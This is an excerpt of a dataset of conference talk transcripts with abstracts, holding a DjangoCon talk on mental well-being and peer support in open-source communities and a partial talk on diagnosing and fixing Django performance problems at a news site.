doi
stringlengths 17
24
| transcript
stringlengths 305
148k
| abstract
stringlengths 5
6.38k
|
---|---|---|
10.5446/32699 (DOI)
|
Come on, yo! MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC So, I'm going to talk to you today about healthy minds in a healthy community. So, as I said, my name is Eric and if you've seen me online, you might recognize me as the Shippet Squirrel instead, my avatar on GitHub. It was mine before GitHub made it into their emoji. So, I'm also a general co-developer. This is my first ever trip to the US and the furthest and longest I've ever been away from home. My friend, Mikey Ariel, she's not here. Your eyes do not fool you, but we basically built this talk together for general in Europe. I'll be coming back to that process a few times also, but it really would not have existed without her. So, this talk has a mix of stories that are mine, that are Mikey's and there are also many other community members and friends that share their stories with us and that made it into this talk. So, I do want to ask everyone that what's this talk or listens to it later or reads the transcripts to keep in mind that the point of this talk is to help trust and openness and we're going to touch on some sensitive issues. So, I would like to ask you to handle whatever is shared both by us and by maybe people later that have more courage to share things now with care both during and after. So, the first thing I want to talk about is how none of us are alone. Because with so many people I meet, both here and in so many other places, I feel like they very much have their life together and they tell the meal about all their wonderful work and how they seem to get along with everybody. And I've seen all these amazing projects that over amazingly and there have never a problem and everything seems entirely smooth sailing for them. But over the years I found that when I get to know some of these people better, they open up to me and I find out how wrong I actually was about them. Because for many of the people that I admire the most and sometimes even envy the people that seem to have everything together more than anyone else that I ever know I was wrong. Because once they open up to me I hear stories of depression, of anxiety, of old-sity, PTSD, or sometimes even self-harm. And I felt completely blindsided again and again about how serious some of these stories are and makes me feel even more impressed about what these people have still achieved. But it's left me increasingly thinking that I probably actually know very few people that have never started with their well-being. And it's just that many of them have never felt, never wanted to be open with me, which is of course fine if that's their choice. But it's taught me that no matter how successful someone appears and how amazing their work might be and how well it might be going and they have endless creativity they may very well be spending tremendous amounts of energy just to get through daily life. And it isn't uncommon because one in four people roughly will experience at some point in their lifetime mental illness. So that could be things that are with you your entire life, like a development disorder or things that are later like burnout, OCD, or depression. And then once it shows for some people this is something that will affect the nurse of the life for some it is something that with help they can deal with fairly quickly. So there's a lot of variation in those experiences but about, but one in four people will go through that experience during their life. 
And that might still be a minority but there are many other people who struggle with their well-being without necessarily qualifying for a mental illness diagnosis. So for example 70% of office workers regularly experiences physical symptoms due to stress, which means that due to their stress level they are excessively tired, had a neck pain, a very typical sleep problems, things like that. And so they might not always meet the bar for a diagnosis of mental illness, but especially in the long term such high stress levels are very harmful to our health. So even when a minority might have an actual mental illness diagnosis a large majority is or will be suffering from issues that affect their well-being and have an impact on their life. So let's do a little lesson in Dutch. How gaat het? Means how are you? And the answer in Dutch to this question is goed, which means good. So there's no actual question of how you actually are. When someone asks you who had it in an illness that doesn't mean they want to know how you're doing, they just want to say goed. And this is like, this is very typical in many of our cultures. It's like saying I'm fine, I'm just tired, which is also sometimes true, but it's also something we often use to hide our issues and just say no, no, I'm just tired, it's all fine. And hiding our issues is just very common. But the reality of it is that there are other people in this room that probably have the same struggles. I know that there are people in this community that are struggling and sometimes it's a lot, sometimes it's a little. And some of these people I know and I've heard their stories, but there are many that I have never heard. But it's definitely convinced that if you are struggling, there are other people in this room that know exactly how you feel. And there are probably some people in this room that suffer from depression, someone with low self-esteem, someone with an eating disorder, social anxiety, self-identity issues or anything else. And even if other people here don't necessarily have the same experience as you, they might still understand because they know what it's like to struggle. So I don't know exactly who all these people are, but I know that they're here. So at GeneralCoin Europe 2015, there were free counseling sessions which were available to all attendees. And one in 10 attendees used that service. So you could pick a time slot from a board. It was completely anonymous. You did not have to say your name. You didn't have to sign up anywhere, no emails. And so you got 25 minutes with a counselor to talk about whatever you wanted. And 25 minutes is not enough to do any treatment of serious mental illness, but it can help a lot on getting people on a path to feeling better, to give them tips on how to do better self-care or help guide them towards more extensive professional help. My favorite two bits of feedback from those well-being sessions were someone who said, it's been a relief to finally say these things out loud and have acknowledgement of the problem. And I found it useful and relaxed. And I feel like I'm not crazy or alone. And this is normal. And they reflect very well how people generally thought about these sessions, not as an immediate fix to all your problems, but a place to say things out loud, not be afraid that you'll be judged, and feel validated and acknowledged that the issues they're experiencing are real. 
Even if they might not be the same as those of other people, or you might feel they are less serious than those of other people. And that's also what this talk is basically about. So I'm not a trained mental health professional in any way. So I can't treat someone's eating disorder. And after this talk, and with several of the projects I'll be announcing, I can't solve someone's anxiety completely. I can't remove stress insecurities. But like short counseling sessions, even though I'm not a professional, and even though you're not a professional, we can all make a difference. Because that we includes you, and that is all of our community. By being considerate, empathic, accepting, and understanding, and helping anyone who struggles to feel validated and not alone. Because none of us are. And whether it's struggling with serious, multiple, complicated disorders, or sometimes just feeling like the stress is taking a toll on you, those struggles are valid because they're impacting our lives. And know that whatever you're struggling with, you aren't crazy, you aren't any less lovable. And most of all, you're not alone in our community. So now that we know that we're not the only ones struggling, and that these aren't unicorn problems, let's talk about some of the first steps we can do to help ourselves out of whatever's troubling us. Because the last thing many of us ever want to do is to admit that we're struggling, that we can be overwhelmed, and that we're not superhuman. But how do we end up overwhelmed? Because most of us are responsible, mostly functioning adults. But yet it is so easy to end up in a situation where we're constantly fighting against ourselves and balance all our work and all our tasks and projects, conferences, hobbies, friends, and in the end sometimes sleep. And most of us are probably generally like people value contributions in our company, and a lot of contributors, including myself, get a lot of satisfaction from participating in projects in our community. But that is exactly also where the problem starts. Because somewhere along the way, we sometimes forget that we need to help ourselves before we can help anyone else. So before whether it's being excited about a potential project, an invitation to speak at a conference, to organize a conference, or workplace increasing your workload because you are the rock star that can do absolutely everything, it is so easy to get caught up in a desire to contribute and to help and to be a part of things that we lose control over our own time, energy, and mental resources. And that is where things get dangerous. When I forget that in the end, my participation is supposed to create a positive impact, not just on my peers, not just on my community, or on the rest of the world, but most of all on me. When I forget that, then being helpful does not help me. So if that sounds selfish to you, consider that putting yourself first is not always selfish and could even save lives. So if you've flown an airplane before, you might remember the oxygen mask where you should always put your own mask on before you help anyone else. And that is because if the person that needs your help passes out, then you still have time to help them. But if you help someone else first and it doesn't work, then you all pass out and nobody can help anyone at all. So in other words, if you take care of your own well-being first, there's probably still time to help others. 
But if you forget to take care of others first, and only focus on others first, you might run out of air before you can help anyone. And I myself also at risk of over-commitment because I get really excited about things and I want to participate in everything, or I'm invited to participate in something and then I feel valued and validates for it, which makes it hard to turn on product offers or step down from something that I've already joined. But why is it so hard for us to say no to a product? And why is it even harder to say no more? But we need to step down. From my own experience and from what I've discussed with many others, I have two main reasons for this. One, being afraid that if we turn down or step down from something, it means that we're failing. And second, that people might respond in a negative way. So how can we address some of these fears and gain some confidence that we need to make these decisions? When I asked Mikey to help me build and present the first version of this talk, she had just changed careers for the third time, moved to a different city, moved from her office work to home office work, and she had a million other projects going. And at some point I confronted Mikey with what was in her own words she should have confronted herself with. She was dropping the ball on this product and she was risking the entire collaboration because she was trying to juggle way too many things. Unfortunately, we're very good friends and we were building a talk about well-being, so we have a good productive conversation about it. And so she was able to admit that she had a problem and had to make really tough choices about what's to come because she could not keep going with all the projects that she had. So fortunately she decided to keep building on this project, which is why this talk exists now. But we have to remember that sustainability isn't only important for open source projects but for the open source servers too. And that might be simpler than you think because if I burn out, I am useless to everyone including for both myself and to others. So I cannot let short-term satisfaction or validation impact my long-term capacity. So now you looked at your project commitments and as your free time or whatever is left of it and you realize that you must really balance your life better. Now you need to communicate as with your peers, which brings us to the second reason why saying no is hard because what will people think? Unfortunately even after you admit to yourself that you need to trim down on your commitments the next step of actually communicating this can seem like an even bigger hurdle than admitting this to yourself. So if we look at long-term open source servers, sometimes this is even scarier because we spoke to several veteran contributors who feel like the project has become so dependent on them that they are essentially trapped in their roles because the project might fail if they leave and they cannot let the community down. But humans are social creatures and most of us work at jobs where there is not really a finish line. It is more an ongoing, always developing, it is never actually done. That makes us very dependent on consistent subjective feedback from our peers and that's combined in a culture that encourages overachieving and overcommitting means that it's not strange that some of us were afraid of saying no or no more. 
So when I wrote Mikey about my concerns about how she was handling our project that was not an easy thing to write because I was very annoyed with how we were going. I was annoyed with that we weren't making any progress, worried that the whole project was going to fail after we already put months of work into it. But I know her quite well and care a lot about her so I could be sure that she didn't do this because she didn't care about me or about the project because what we do isn't always what we are. So in a community of volunteer contributors, which could be thousands of people on an open source project or two people building on a talk, being volunteer means that nobody has to do anything. We are doing this because we want to contribute because we get and get a lot of value doing it but this is all at will. It is even more so than our jobs. So if we suffer through our projects through our conferences or responsibilities or if we have left building this talk damaged our own well-being then there would be no love in the creative process and we would not be serving anyone least of all ourselves. It doesn't matter though how many times people tell me it's okay to step down. People will understand. Just be honest. It's so easy for me to dive into the countless imaginary scenarios of what it would be like if I took that step and most of those imaginary scenarios don't actually involve much understanding or acceptance. It's so easy to come up with so many imaginary scenarios of people not accepting and not understanding but if I actually look in reality both in my own experience and what I've heard from anyone else it's only been met with kindness and understanding. So our fear of the unknown is so much more destructive than the actual consequences of our actions. And even if some people might be offended or it's not bad to you choosing for your own well-being that is more indicative of their own fears and their own insecurities as it means they will need to make adjustments too. If we accept that we can only be helpful if we can retain our own health and balance then we can face our fears with confidence that our action won't just help us but help the project or the community because it also makes space for someone else to step in. If I stay in a role that I can't actually fulfill then it is as if I am licking the cookie but not actually eating it. There is no space for anyone else but I'm not doing it either and everyone ends up suffering including the project. And you might think that if you just love your produce enough and that if you just care about them enough that will just conquer all and then it's all fine. That if we truly care we wouldn't have these issues. But that is absolute nonsense. It's not how it works. Love doesn't conquer all and it doesn't matter whether it's for people or for produce or for communities you always have to help yourself first. So please remember to put on your own oxygen mask first otherwise you will run out of air before you can help anyone else. And it might be taking a moment to think about whether you actually want to join a potential project or taking some moments to figure out which of the products is draining your energy too much and needs to be let go. And don't let your fears paralyze you from taking care of yourself. And that might sound easy but in practice there are a lot of patterns in our community that tend to push us further towards our commitment. 
But for our long road being of our community and the people in it we have to recognize and tackle these. So my favorite is the Ghetto Contribution Graph as it was. They fixed this. So this was my Ghetto Contribution Graph before I first presented this talk and this shows that I must be an absolute useless slacker. It's like I have like 10 contributions in a time 17 contributions in a whole year. My longest streak is a single day. But of course though this doesn't actually accurately reflect my work. I also do a lot of work in private repositories. GitHub recognized this and they removed this whole bottom part and they allowed you to publish private commits as well in here. So mine is now a lot more full but my weekends are still empty which I think is good. Some people I also made some, generate some attention around this thing and some people get very offended by this being removed. Someone called me a neoliberal, emotional jihadist. So that's really interesting. Yeah, people are very attached to that. But yeah, this saying to people will reward you for giving you a bigger number if you just never take breaks. That's for me a very bad way to push people to over commit. A really good example is the Degenerate Solar Foundation for the Commit Committee who just published their documentation which says each member is only obligated to serve for six months being a default term and then you can step down without feeling guilty because like your term has ended so you are done. You can opt in again to continue but the default is that you will stop after six months and no one can look bad at you for that. So it's a really good example of how we can help people to step down in time. It's something we should probably adopt in many other places. Next I'd like to talk a bit about asking for help. Because asking for help can be really hard, I know very well myself, but it's always okay to ask for help. Asking for help isn't just difficult when it comes to well-being. So later this week we are doing sprints and we found like I'm a pretty experienced contributor being on the core team but I found that sometimes people are so reluctant to ask their questions that when they get stuck, especially people who are shy, who are new to our community, who may even have social anxiety issues, they might be so hesitant to ask a question that nobody will help them when they are stuck and they just have a horrible time with sprints. So at the Jang-O-Ner-De Hood sprints last year, we told people that if you see anyone with a sailor hat, you may disturb them anytime and ask them absolutely anything. They might not hold the answer but they can help you find it and if it's their wearing hat, you are not disrupting them from anything else. They are not doing other work that's important. They will not think you are silly. And that works really well because people with questions have know that these people wearing hats explicitly ask to be disturbed and it also works for me as an organizer because when at a moment being helpful doesn't help me, I can take off my hat and I won't be disturbed anymore. So it works really well for both the people who have questions ask the people who answer questions to remove some of those barriers. When I first started thinking about this talk, which was just after Jang-O-Ner-De Hood 2015, I had a lot of very incomplete ideas. I had this random collection of ideas. Some of them are still in the talk today but there was just something missing. It wasn't really going anywhere. 
It just wasn't enough. I couldn't figure out what the missing parts were and so I was pretty stuck. So a few months after I first thought about this talk, I met Mikey at a conference and we quickly became friends and I was still struggling with the talk. When somebody emailed her and said, I have this half-assed idea for a talk, it is absolutely full of holes and this is either my best or worst idea ever. So here are some random incoherent ideas. I don't think I can do this on my own and it's also pretty scary so maybe you want to join me and build this talk together. So that was basically all I had when I first approached Mikey. And a few months later she was very enthusiastic so a few months later we started working on our appropriately named GitHub repo. What it comes down to is this, if I had not asked Mikey for help to work on this talk it would never have happened. I would not have been here. I would probably not even have been at this conference. Sometimes asking for help can seem like failing like saying, I cannot do this on my own. I need someone else to help me with this. It could be a talk you're trying to build. It could be a conference you're trying to organize. A new feature you're trying to build in Django or how to deal with your workplace stress. It could be feeling unwelcome in this community due to social anxiety or needing more quiet time because having a lot of people around you exhausts you quickly. Asking for help does mean admitting that you have difficulty doing something alone but that is not the same as failing. It is in fact quite the opposite. If I would try to organize a conference on my own I imagine it might literally kill me. So either I do it with others and I ask for help all the time and I offer help to my teammates all the time. Because otherwise there is no conference and that would be failing even worse. So if I would have tried to do this talk on my own and had never admitted that I can do it on my own then there would be no talk. So I would only have failed if I would not have asked for help. And when we struggle with things it is so easy to pretend to stick your head in the sand and just pretend they don't exist. Austria just don't actually do this. So it means you don't have to deal with them because they don't exist. And that could be anything from starting with self esteem or having more serious well-being issues that are much more threatening and require professional care. Asking for help can also be hard because when you ask for help you are making it seem more real and it is tempting not to do that. And some people do that for years or decades and keep harming their health in the meantime. But depression doesn't start when you go to professional and panic attacks are real even if you hide them from all your friends successfully. And it may or may not meet the criteria for diagnosis but stress that is harming your health is still impacting your life. So if you are not well and that is impacting your life those issues are already real. They are real whether you talk to your friends or not, whether you seek professional help or not, or whether you try to ignore them. So what you are doing when you are asking for help is not so much making these issues more real but you are taking responsibility for helping yourself because it is okay to ask for help. 
And when you are suffering from well-being issues it might also occur to you that some of them don't or a lot of them even don't really make any sense which is really confusing and also frustrating and can make you feel like you don't deserve any help. Like basically it is all in your head which it is sort of. But yeah, you can feel like you just need to think your way out of it. This is just silly. So for some people everything in their life is going really well but still they feel very depressed and maybe the workload isn't that high objectively but still it costs a lot of stress for you. You might have friends and people might generally seem to like you so there is no need for you to feel out of place and inferior and anxious but still you might do. But to ask for help those feelings don't actually have to make any sense. Our minds do not behave rationally, emotions aren't very rational and the things you struggle with don't have to be rational and often they are actually not. What makes it okay to ask for help is that you are experiencing them and that they are affecting your life and that's all you need. Asking for help can also be very scary because others might judge you, they might make fun of you, they might ridicule you, they might say you are silly for thinking that. When I asked Mikey to work on this talk she could have told me that this was an absolutely ridiculous idea and that I was an complete idiot for thinking this might remotely be a sensible idea. But in my experience such responses are really, really rare and I've never actually personally had it happen to me in this community. But if you do reach out for help and someone makes fun of you or ridicules you or claims that you are just being dramatic and you just act like a grown-up it still doesn't mean it was wrong of you to ask, it just means that this person is toxic and that they are not your friends. And it might also be a violation of the code of conduct so if these things happen, please support it, feel free to reach out to me too. Personally I also have no idea how often I've asked for help and I know I will be doing it a lot more times both in this community, from my friends, from Pierce and other communities sometimes it's with code, sometimes it's with organizing something and sometimes it might be developing a new idea or when I'm not feeling well. And I can tell you that even taking into account everything I've just told you about why it's okay, which are all things I very strongly believe in, asking for help can still be very hard sometimes. Even when I know it's not failing, even when I know that it's okay if things don't make sense to me, and even when I know that the other person is probably happy that I trusted them and asked for their advice. But in reality I've almost never regretted asking for help and it's almost always been a massive relief once I actually pushed myself to do it. So don't expect that asking for help if you remember these things will suddenly make it easy and trivial but if you're not sure, if you're in doubt push yourself a little more to open up a little more. And this community in particular is a really great place to do this because it's filled with the most positive and caring people that I've ever met, which makes it one of the best places to ask for help. And that brings me to talk a little more about helping in communities. So far I've focused a little more on how as individuals we can help each other and others. 
But now I'd like to talk about how the community as a social and professional entity can provide support to our members. So as a collective the general community which we've also seen at this conference with many talks is paving the way with many activities and endorsed projects that have a very positive impact on the productivity and well-being of both our community and other people, which makes our community as a whole more healthy. Some of the good examples in our community already are the general fellowship program where we created a paid position which is directly supported by and funded by the community where the fellow takes on important tasks without having the burden of a full-time job. Because this is very common that open source contributors do this next to their full-time job. So the fellow doesn't need to worry about that. They have a paid position from the general software foundation. And that means in paid contributors which is still most of us can focus more on things they actually enjoy and reduce their risk of burnout a bit. The general girls program could of course not have been successful without the overwhelming positive attitude of both organizers and mentors which makes a huge difference in how newcomers into our community perceive and how they are received into our community. Which again makes our community healthy and happier as well. And having counseling in Europe was a much more direct step to reach out to community members and invite them to talk in a professional environment about their thoughts and feelings. That's not something you can easily do in many places. But also that is not always what is needed professional help. You might have seen recently a internet comic which is very sweet and very powerful called How to Care for a SAC person which shows, this is the last step, which shows how you could support someone who is not feeling well without necessarily fixing all their immediate problems. Because sometimes all we really need is someone to understand and not judge and give us a metaphorical or physical hug. And that is something where our community can make a difference and also where you can make a difference. Because like I said there were a lot of horrible ideas that never made it into the talk. But there was one which I am very happy with that did, which is the General Software Foundation Wellbeing Committee. This is an idea that came up when we were trying to think of ways in which the community can support members in a more structured way as part of a global ongoing thing rather than individual counseling sessions for example. The DSF cannot of course provide professional help on an ongoing basis so the idea of this committee is to provide a formalized peer support network where general community members can consult with other community members about anything from work life balance, burnout, self esteem, anxiety, depression and so on. So we actually announced this plan some months ago at General Green Europe and I hope that we would have actual much progress now but we haven't made much yet. Because we had other priorities and it seemed a little silly to have building the Wellbeing Committee affect my own wellbeing. But it's still very high on our list and I'm probably going to focus on this during the spints and we still have a lot of details to work out because of course one of the points of attention is how do we protect the wellbeing after the members of the wellbeing committee. 
But at least we do have preliminary approval and support from the DSF boards to place this under the General Software Foundation. And the mission of the committee would basically be to provide peer support for community members that needs to talk to someone who understands. Because I often find that just being able to talk to someone else who's experienced some of the same issues that I have especially people who are familiar with tech and open source can be already a massive relief. When we say peer support you can think of projects like Big Brother or Big Sister or Alcoholics Anonymous where people who are not professionally trained provide basically a way to support others. So it would be a baseline communication channel that other people in the community can use to express their thoughts and feelings in a safe environment. And what we're hoping for is to help people get past some of their initial fears like that nobody understands and how problems don't make sense. And if needed help it will make the staff to professional care easier by making people feel more validated. So some of the topics that we've been thinking of are based on the themes that are very common in general from Europe counseling are these but of course it's not an exhaustive list it also depends on who we can actually find for the committee. Which so far is myself, Mikey, Daniela Prasida of the Dyinger Sovereign Foundation Board will get us started on behalf of the DSF. And at this point we'd also like to call for any people who are interested in exploring this yet unknown territory of formalized peer support in open source communities. If you have already responded after the journey from Europe we haven't forgotten about you we haven't had enough time yet. And also remember that this committee is set up to help the community with wellbeing issues not create more wellbeing issues. So also consider your own wellbeing and your participation. But if you're not sure you send us an email I will have an address later and you won't be committed to anything. And also keep in mind that peer support is not a substitute for professional help and so we'll also have to make sure that the committee members take care of their own wellbeing first so we may not be able to help everyone. But that's not always what we need it because sometimes you don't often you don't need to be a healthcare professional to help someone feel like a happy little sushi roll and that's basically what we're trying to move forward with this project. So I said before that no matter what you're struggling with that doesn't make you any less lovable. But in general most people both in our community and outside of it don't actually feel as loved as they are. So I'm one of the organizers for Dengon Rude Hood which is an in-depth Dengon conference with 300 attendees in Amsterdam. And basically my task in a team is dealing with Dutch people. And there's probably a number of people in this room who can tell you that organizing conferences especially with volunteer teams can be really stressful. So there's venues, there's speakers, there's sponsors, tickets, budgets, food, party, hotels, flights, communication on your website, your social media, artwork, posters, supporting attendees and code of conduct and much more. And there are always things that almost go horribly wrong during the conference that are quickly fixed behind the scenes without anyone noticing. But of course adding to the stress level of organizers. 
Now for me the conferences are fairly short and I'm doing this in a team that supports me also. So even though it can be very stressful I feel like it's something I can absolutely deal with. And I also feel like when I can't there's space for me to step back and for other people to cover things for me. But most of all, all the stress that organizing a conference involves and all the effort that it requires, all the things that almost went horribly wrong, the number of times we accidentally locked all our attendees into the conference room, they are all worth it for me and I mentioned for many other organizers when I get an email like this. I feel totally overwhelmed, surprised and very, very grateful. Thank you for caring. You are unbelievable. You are a bunch of the craziest, the most positive people I've met. You inspire me to get back to the community even more. I wish I could express properly what I'm feeling right now. May it always rain straw bottles on you. But not all the time, that could be inconvenient. Or may it feel like having straw bottles. Or someone that you like feels like having straw bottles. Or you just want to make it rain straw bottles. Sending hugs. You crazy amazing people. If you don't know what straw bottles are by the way, I have some here which I'll be ending out later. So we got this email from an attendee. They ran into some kind of problem. We were able to help them as organizers with our resources. And this was not nearly the only email or tweet that was like this. And for me, being able to help people feel like this is why I love organizing conferences and other things in this community. So if you've ever organized events or done anything else that is a high stress situation, you might also know that your team is everything. Because it's so important to feel like you can ask for help and that you can start back even if you never have to just to know that that is there. Because even when we need help and even when you sometimes need to start back, when we sometimes flake with our work, when we make mistakes, we are probably much more appreciative than we think. Because this community is full of friends that are loving, caring and supportive. And that's why I'm still here myself. And almost all of us sometimes flake and all, frequently all of us make mistakes. But our community is here to support us when that happens. So in the Jamming community, there's already a lot of good work in that area by having for example posters that try to create a bit of positive atmosphere in which people feel welcome and feel like they're part of this with a slack channel so that people who might not know anyone here and might be anxious to talk to people can find connections with other people and maybe find things to do. And so we try to bring part in this community already to make everyone feel that they're part of this and that we are very happy to have them here. But unfortunately, reality is still very often like this where we don't feel like we need to tell someone when we appreciate their work and we're happy with their contributions that are much more vocal about dislike of someone else's work. But the feeling that you're making a difference and that your work matters and has value that the people you work with are happy to work with you is really great feeling and it's not only great, it is really important because it makes us feel like we matter helps, may helps us feel like we are making positive change and it gives energy. 
So whether it's writing code or supporting DSF, fixing the general docs or helping to build events which are small or large or anything else, feeling that you've made a useful contribution has also especially huge effects on people that struggle with self esteem, that might be struggling with burnout or anxiety or anyone even leaning towards those a little bit which applies to so many of us. And I can certainly say for me that seeing emails and tweets like the one I read out makes a huge difference and we feel that our community would be an even better place if there would be more of that because we don't always let people know how we feel and how much we care about them. So with that in mind we built open source happiness packets because the thing is openly expressing appreciation gratitude or happiness to other people can be really difficult especially when you don't know them very well, many of us come from cultures in which people are not open by default about such feelings and you might naturally feel uncomfortable or even a bit creepy sharing things like that. So, happiness packets is a very simple platform to anonymously reach out to people that you appreciate or that you are thankful to in this community. We can make messages anonymous but of course we encourage people to share who we're there from but if you really don't want to, you don't have to. So far we've had about 170 happiness packets sent, some of them are published on the site if both sites can send a receiver and sender then we publish it on our site and we are really excited to see where this will go and also where we can take this together. And I'm fairly sure everyone in this room can think of people in this community that they are grateful to that they admire, that have done something for them and so I want to ask you to try to send, to find two people to send a happiness packet before the end of the conference. And I know how awkward it can feel a little at first but I guarantee you you are making a huge difference to both yourself and the person sending it to. But don't take my word for it and a number of people already see the system and tweeted about it so Katie who's not here wrote about how she woke up to a happiness packet and it was the absolute best thing. Anna wrote how receiving her first happiness packets put a huge smile on her face and she was recommending anyone to send one also. Lacey co-chair here described it as an amazing fuzzy feeling that makes your day. And my favorite is from Ola who wrote that she got the Jeremy Yerbka happiness packet and it made her tear up at a bus stop. So this is the effect you can have on other people and also it creates a little positive vibe for yourself. I have happiness packets I have 500 so I think this should be enough. So find me to get some stickers. They are also you may have seen them spread around the venue. They also fit exactly on the mini store bottles that I brought. But the stickers aren't edible so don't look down and don't forget to also send some happiness packets yourself. So I always paid it. First of all the thanks go out to Russell who is conveniently over there and Amber Brown who we interviewed as the early research of this process and who inspired various of the concepts in here. Ola Sitariska built the entire design for happiness packets and I will show you how it looked like when I designed it. Daniela Pashida helped us to get started from the DSF board with the well-being committee. 
Of course the organizers for giving me space to talk about this and there are tons of other people among our peers and friends that contributed knowingly or unknowingly to the stock. So send your own happiness packet on happinesspackets.io We are on Twitter as happiness packet because you can fit happiness packets into a Twitter name site in this plan there. Send me an email. This goes to both Mikey and me if you want to join the well-being committee and help us build the support network. We don't actually take support requests yet because we're still working on the foundations but there will be announcements once this actually is running. We also found a lot of other resources while working on this which in no way fit in the stock but there's a public GitHub repo where I also just push the slides to and there are also a lot of other resources there around well-being. Feel free to contribute your own resources as well and also the slides in there. And the last thing I want to leave you with is to always remember that wanting to be happier never makes you selfish, negative, or ungrateful because you deserve to be as happy as you can. Thank you very much. applause music music music music music
|
Open source communities attract and boast passionate, idealistic people, and many of us invest copious amounts of time and effort to contribute to our projects and support our communities. This underlying emotional attachment can make us more vulnerable to elevated stress, burnout and conflicts. And then there are those of us who also manage mental illness. More often than not, we suffer these struggles in silence, feeling (and fearing) that we’re alone in our trouble. Here, our communities can make a huge difference, by building a positive and safe environment where we can blossom and support ourselves and our peers, and feel included. The community around Django is already very mindful towards inclusivity, and keeping an eye on the well-being of community members. We have recently launched several new projects to further promote the well-being of our community members. This talk will take a look at open-source communities through the eyes of various mental well-being issues and struggles, and discuss and report on the progress our new initiatives. Hopefully, this will help foster healthy minds in a healthy environment.
|
10.5446/32700 (DOI)
|
Come on, y'all! So today I'm going to be talking about basically the performance issues that we dealt with at the Atlantic over the last year, how we overcame them, and some of the things that we learned on the way there. So I'd like to start off by thanking the organizers of DjangoCon for taking interest in my proposal, all of you for coming to listen to it. And I think one of the most valuable things about this conference on par with the talks and the events is the opportunity presents to meet and talk to some really smart people. In fact, the work I did in the past year would eventually became this talk, was thanks to a conversation I had with one of the founders of OPI. And if you're not familiar with them, they're a service for monitoring performance of web apps, similar to New Relic, but with a special focus on Django. At the time, in September of last year, we were struggling with growing pains in our Django application. We had just completed a huge project, the porting of over six years of legacy code, a mix of PHP and Perl, to a Django-powered CMS in front end. There were a few performance hiccups at launch, but we eventually overcame most of those, with one important exception. Our servers basically melted when we deployed. At the time, we were using modWiskey, so our process was basically to see up the code using a fabric script and then touch the whiskey file. Today, as you can see, and you're reading that correctly here, 80 second response times and now down to 150 milliseconds. I'm going to first cover the things, there wasn't one single thing that we did that addressed our performance issues. It was a bunch of small things, a couple things that were actually low hanging fruit that were great wins, but in general, it was a bunch of small things that build up to fixing our performance problems. The first thing is monitoring and profiling. If you don't understand what your bottlenecks are and you don't understand where the slowness is occurring or where the app is freezing up, then you're just sort of stabbing in the dark. I also think it's important to tackle the easy stuff first in quotes here. Query optimization and caching are sort of pretty easy ways to get quick wins with the application. Also, this talk is very focused on the server side of things, but it's important not to neglect front end performance as well, which is like a completely different ball game, but you can have a super fast server and still your JavaScript takes 20 seconds to load and nobody visits your site. So for profiling, we found the most use with hosted services, New Relic or Op-Beat are both comparable and great services, and we identified a number of really important performance issues in our site with those. Also, everybody I'm sure is familiar with Django Debug toolbar. I recently came across Django Silk, which seems like a really promising application for sort of a different way of profiling your Django application. And if you're a masochist, you can always try Cprofile, PyProf, toCulture, and Kcashgrind. And also, there's some whiskey middleware, which I've had mixed experience with. There was like one bit of code that I was able to like kind of figure out where things were going wrong with that, but it was really difficult to set up and probably not worth the effort. Monitoring, there are downtime notifications, some of them hosted a lot of the same services that provide performance monitoring, New Relic, Op-Beat, and then also a Lurtrin, Chartbeat, provide the service as well. 
And then you can have self-hosted services like Nagio, Centrumany Forks, and also others like Zavix. So with the easy stuff, caching, using a CDN, we, at the time that we launched, we did have a CDN that we weren't using our cached headers properly. And so kind of being really strategic about where we said what to vary the cache on and when and how long to cache the page, particularly for archival pieces, really helped us with some of the traffic we got from crawlers and bots, which is the majority of the traffic that gets past our CDN. It's important, I think, to have a proxy cache, whether it's Nginx, Squid, or Varnish, we use Nginx, and we've had a great success with it. One of the really great things about the Nginx proxy cache is you can actually set it up to just cache for five seconds or two seconds, but to hold the information in the cache as long as there, until there's a 200 response. So if your application goes down, that two-second cache key will hold up until your site comes back up again. We've had this really save us, like, you know, somebody deployed some bad code or there's an issue with the database and the site, nobody really realized that the site was down, because we had this two-second cache that basically lasted all night. Also with caching, the stuff that comes built in with Django, like the cache template tag, at cache property, cache static file storage, the cache, the information about where the static files are located on the file system, and the cache template loader, which does the same thing for the template finder. Page caching frameworks, we actually have one that I thought we had open sourced, and I realized today that we have it closed sourced for some reason, so I talked to my co-worker and we're going to open source it called Django CacheCal in the spirit of sort of punny, stupid names for Django projects. It's kind of loosely based on Django, which hasn't been updated in three years, and still is as alpha, so maybe it's an improvement on it, but there's also, you know, a number of really decent page caching frameworks. O-R-M caching, like Django Cache Machine, I feel like is a mixed bag, and I'll actually get to that in the next slide. So for query optimization, there's the obvious stuff, like prefetch related and select related. Prefetch related objects, which is in 1.10 public, though it's accessible in earlier versions of Django, that allows you to pass a callable and filter the objects that you prefetch on, so that you can prefetch conditionally items in the query set. For instance, in a generic foreign key, you can prefetch all of the instances of one model, this field, and not have to worry about it conflicting with other results in the query set that might be from different models that do not have that field. Dot values and dot values list, I found this really surprising. When you're profiling Django, one of the things that we found to have like a huge impact, but which doesn't really show up in any profiling, is model instantiation and hydration, because, and this is what ties back until like Django Cache Machine. We had a query that basically we stored in the database, we had all the different ad slots on our site, and then the breakpoints that they were enabled, and the sizes of the ad units, and all together with the prefetch relating and the, you know, select related, this amounted to I think like 700 instances being loaded into memory on every request, which came out to about 80 milliseconds, 100 milliseconds per request. 
When we switched this to just dot values and, you know, manipulated a dict, basically simulate the prefetch related. Like I said, 80 millisecond drop in every request. So that was like a huge gain, basically made our response times about 25% faster at that point. And then obviously, you know, but much more difficult database parameter tuning and judicious indexing. And you can always throw more hardware at the problem that was, you know, part of our speed gains there was cheating. We upgraded from like four year old servers to brand new servers that ran, you know, twice as fast. So, you know, that cut our response times in half. Now, you might notice from the earlier thing, the only thing in this chart is request queuing. What is request queuing? So to explain that, I'm going to rewind a little bit and just kind of talk about how we were set up. So we had, I think, what's a fairly standard way of load balancing a Django application. We had Nginx in front of it as a proxy cache. And then we had a couple of application servers. In this case, they were running modWizgi behind it. The Nginx was listening on port 80. And then we had the different applications listening on different ports and defined upstreams in the Nginx config across the different app servers. We also had a stage version of our site which we would use to test out code and production on the production environment. And we just had like a different port for it. So, you know, our directory structure looks something like this. The discussion I had last year at DjangoCon with the founder of Opet, you know, so I was explaining to him this problem we had. We would load everything up. We would try and freeload as much as we could. Then we would touch the Wizgi file and then kind of cross our fingers. And if we were, we happen to be slammed by a bot at that time. The site, all the code that it took to load. On our local dev machines, just loading up one worker process, it would take maybe 10 seconds. But on the server loading 40 workers simultaneously across, 